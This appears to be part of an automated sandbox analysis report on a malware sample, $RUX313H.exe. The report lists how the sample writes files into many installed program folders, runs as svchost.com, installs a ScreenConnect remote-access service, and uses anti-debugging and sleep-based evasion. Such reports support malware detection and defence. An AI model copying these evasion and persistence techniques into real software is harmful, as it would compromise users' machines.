                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Code function: 9_2_003F1880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,9_2_003F1880
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Code function: 1_2_00DF1AD7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00DF1AD7
                          Source: C:\Users\user\Desktop\$RUX313H.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Users\user\Desktop\$RUX313H.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\svchost.com | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX (30 identical entries)
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe  Process information set: NOOPENFILEERRORBOX (52 identical entries)
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe  Process information set: NOOPENFILEERRORBOX (50 identical entries)
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe TID: 2016  Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe TID: 5048  Thread sleep count: 222 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 3976  Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe  Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess  graph_1-19808
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe  Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\svchost.com  API coverage: 9.7 %
                          Source: C:\Windows\System32\msiexec.exe  Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                          Source: C:\Windows\System32\msiexec.exe  Dropped PE file which has not been started: C:\Windows\Installer\MSI13D3.tmp
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          Source: C:\Windows\SysWOW64\rundll32.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                          Source: C:\Windows\SysWOW64\rundll32.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                          Source: C:\Windows\System32\msiexec.exe  Dropped PE file which has not been started: C:\Windows\Installer\MSI1045.tmp
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                          Source: C:\Windows\System32\msiexec.exe  Dropped PE file which has not been started: C:\Windows\Installer\MSIFE7.tmp
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                          Source: C:\Users\user\Desktop\$RUX313H.exeAPI call chain: ExitProcess graph end nodegraph_0-9870
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeAPI call chain: ExitProcess graph end nodegraph_1-19810
                          Source: C:\Windows\svchost.comAPI call chain: ExitProcess graph end nodegraph_2-9871
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                          Source: C:\Windows\svchost.comCode function: 2_2_00405634 FindFirstFileA,FindNextFileA,FindClose,2_2_00405634
                          Source: C:\Windows\svchost.comCode function: 2_2_00404F6C FindFirstFileA,FindClose,2_2_00404F6C
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0C4
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0CC
                          Source: C:\Windows\svchost.comCode function: 2_2_00405080 FindFirstFileA,FindNextFileA,FindClose,2_2_00405080
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,2_2_0040F13F
                          Source: C:\Windows\svchost.comCode function: 2_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,2_2_004056A7
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EA04 FindFirstFileA,FindClose,2_2_0040EA04
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB16 FindFirstFileA,FindClose,2_2_0040EB16
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,2_2_0040EB18
                          Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,1_2_00DF1140
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF13CC IsDebuggerPresent,1_2_00DF13CC
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF435A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00DF435A
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1EBA GetProcessHeap,1_2_00DF1EBA
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeMemory allocated: page read and write | page guardJump to behavior
